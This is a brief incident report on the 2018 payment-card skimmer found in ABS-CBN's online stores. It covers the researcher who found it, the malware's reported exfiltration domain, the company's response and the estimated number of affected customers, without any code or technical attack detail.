Cyber Incident Victim: ABS-CBN

The ABS-CBN data breach was discovered by Dutch security researcher Willem de Groot, who identified a payment skimmer operating within the Filipino broadcaster's online store. The malware, embedded in an obfuscated JavaScript file on the store's website, had been active since at least August 16, 2018, and remained unchanged for four weeks prior to detection. This skimmer intercepted customers' payment card details during the checkout process when purchases were made through the ABS-CBN Store and UAAP Store websites. The stolen financial data was transmitted to a server associated with the domain adaptivecss.org, which was hosted on a Russian network in Irkutsk. This network was also linked to coffeemokko.com, a domain previously connected to other malware campaigns uncovered by de Groot. Google Chrome flagged the affected online store as insecure at the time of discovery, though the exact method of initial compromise remained unspecified. De Groot attempted to notify ABS-CBN about the breach but received no immediate response.

On September 19, 2018, ABS-CBN confirmed the incident was under investigation and temporarily shut down both affected store websites. The company stated the breach was isolated to these two e-commerce platforms, with no impact on other digital properties. ABS-CBN estimated 213 customers may have had their financial data compromised during the skimmer's operation. The broadcaster characterized the incident as a theft of payment card information but did not disclose technical specifics about how the malware was deployed or whether additional personal data was accessed. In a public statement, ABS-CBN emphasized its commitment to customer privacy and security, pledging to implement measures to prevent future breaches. The duration of the skimmer's activity and its connection to known malicious infrastructure suggested a coordinated attack, though no threat actor claimed responsibility.